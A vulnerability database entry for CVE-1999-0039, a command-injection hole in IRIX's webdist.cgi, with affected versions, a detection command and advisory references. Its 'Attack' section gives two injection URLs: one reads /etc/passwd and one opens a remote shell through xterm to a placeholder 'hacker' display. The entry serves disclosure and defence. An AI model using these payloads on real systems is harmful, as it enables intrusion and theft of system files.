Brief description: The webdist.cgi (1) program allows both local and remote users to execute arbitrary commands with the privileges of the httpd daemon.
Full description: The file webdist.html is installed in the default document root directories for both the Netsite and Out Box servers. This file defines an HTML form interface that allows the webdist (1) to be executed by a remote user. The CGI program webdist.cgi (1) invokes webdist . But webdist.cgi does not check its arguments for shell commands, so it is possible to execute arbitrary commands with the privileges of the web daemon.
Components: webdist.cgi (trusted), IRIX Mindshare Out Box software package
Systems: IRIX 5.3 (trusted), IRIX 6.0.1 (trusted), IRIX 6.1 (trusted), IRIX 6.2 (trusted), IRIX 6.3 (trusted), IRIX 6.4 (trusted)
Effect(s) of exploiting: Attackers can execute arbitrary commands with the privilege of the httpd daemon.
Detecting the hole:
versions outbox.sw.webdist
to determine if the webdist package is installed.
Fixing the hole:
Other information:
PA Classification(s):
RISOS Classification(s):
DCS Classification(s):
CVE Number: CVE-1999-0039 -- Arbitrary command execution using webdist CGI program in IRIX.
Attack: Either of the following deminstrate the flaw:
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh
Advisories: Security Focus database 374 , CERT Advisory CA-97.12 CIAC Advisory H-102 , SGI's Security Advisory Number 19970501-02-PX , ISS X-Force entry 333
Related Vulnerabilities:
Reporting: SGI in SGI Advisory 19970501-02-PX (May 6, 1997 )